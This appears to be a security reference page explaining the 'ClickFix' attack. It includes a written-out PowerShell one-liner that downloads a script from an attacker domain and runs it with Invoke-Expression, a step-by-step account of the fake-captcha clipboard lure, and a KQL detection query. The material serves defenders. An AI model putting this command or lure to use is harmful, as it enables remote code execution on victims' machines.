Clickfix IEX

Download and execute a PowerShell script from a remote URL via Invoke-Expression. The payload is fetched at runtime from the attacker-controlled domain.

This command runs on Windows
Example Command breakdown
Hover over highlighted segments to see what each part does.
powershell -c "iex (New-Object Net.WebClient).DownloadString('https://fix-support.icu/p')")
1Invoke PowerShell

Runs PowerShell and passes the following string as a single command to execute.

powershell -c 
2Invoke-Expression

iex (Invoke-Expression) executes whatever string is passed to it. The opening quote starts the command string.

"iex (
3Create WebClient

Creates a .NET WebClient object used to perform HTTP requests.

New-Object Net.WebClient
4Download from URL

Downloads the content at the URL as a string. The attacker hosts a PowerShell script; this fetches it.

).DownloadString('https://fix-support.icu/p')
5Close and execute

Closes the command string. The downloaded script is passed to iex and executed.

")
How it works
The attack chain from victim execution to payload delivery
  1. 1

    Victim runs the command

    The powershell -c one-liner is presented on a fake “support” or “fix” page. The page copies the command to the clipboard, then prompts the victim to press Win+R, Ctrl+V, and Enter.

  2. 2

    HTTP download

    WebClient.DownloadString fetches the content from https://fix-support.icu/p. The URL hosts a PowerShell script.

  3. 3

    Execute

    iex (Invoke-Expression) executes the downloaded script. The script could launch calc.exe, run further downloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks. A fake reCAPTCHA-style prompt feels familiar and trustworthy.
  • Full script control. The attacker can host any PowerShell script. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the script on the server. No need to redistribute links or documents.
  • URL in command. Unlike DNS-based approaches, the domain is visible in the command. Blocklists and URL filtering can help defenders.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Launch demo
Hunting
Detection queries for IEX + WebClient download execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "iex"
  and ProcessCommandLine contains "DownloadString"
  and ProcessCommandLine contains "WebClient"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine